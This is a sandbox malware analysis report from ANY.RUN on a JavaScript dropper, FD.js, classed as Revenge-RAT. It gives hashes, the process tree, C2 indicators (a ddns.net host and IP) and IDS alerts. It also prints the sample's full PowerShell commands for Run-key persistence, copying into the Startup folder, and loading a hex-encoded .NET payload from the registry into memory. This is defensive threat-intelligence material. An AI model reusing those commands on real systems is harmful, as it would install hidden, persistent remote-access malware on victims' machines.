analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FD.js

Full analysis: https://app.any.run/tasks/27767496-949a-4fc1-97ad-f72cf240cbf0
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: August 17, 2019, 09:34:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
revenge
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5:

BBD629C03C05F0027C2A78103C2E9BB0

SHA1:

CD93A3DC1291343DE8F27C6436B111DCE0803575

SHA256:

72D8C0835F987BDA04AA8613BC251A9455DFB802EB6F83BE3A944BF83B49AADF

SSDEEP:

3072:kJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJo:p

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • REVENGE was detected

      • powershell.exe (PID: 3144)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 2608)
    • Connects to CnC server

      • powershell.exe (PID: 3144)
    • Writes to a start menu file

      • powershell.exe (PID: 2824)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 3144)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 3528)
    • Creates files in the user directory

      • powershell.exe (PID: 2824)
      • powershell.exe (PID: 3144)
      • powershell.exe (PID: 2608)
    • Loads DLL from Mozilla Firefox

      • powershell.exe (PID: 3144)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe powershell.exe #REVENGE powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3528"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FD.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2608"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value 'C:\Users\admin\AppData\Local\Temp\FD.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2824"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\FD.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\FD.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3144"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\Run' -name 'Sysinfo').Sysinfo;$_b=$_b.replace('f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'5');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
702
Read events
532
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZKQH1YFKP5AEVFQ6F91L.temp
MD5:
SHA256:
2824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7WRGCQUO9GP4GXHOQVXE.temp
MD5:
SHA256:
3144powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZZZLABZH31SNU1A643C.temp
MD5:
SHA256:
2824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169ca2.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3144powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169cd1.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FD.jstext
MD5:6BF494C45DA47008EF450E66B4431783
SHA256:83B03D3175D28945E36E40E3EF6D860C086B5A19C9202F2555C72EEBB56E50F3
3144powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169cd1.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3144
powershell.exe
186.6.86.145:5214
meterpreter19.ddns.net
Compañía Dominicana de Teléfonos, C. por A. - CODETEL
DO
malicious

DNS requests

Domain
IP
Reputation
meterpreter19.ddns.net
  • 186.6.86.145
malicious

Threats

PID
Process
Class
Message
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Revenge-RAT CnC Checkin
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3144
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge-RAT (Win32.Netsha.RAT) C2 response
24 ETPRO signatures available at the full report
No debug info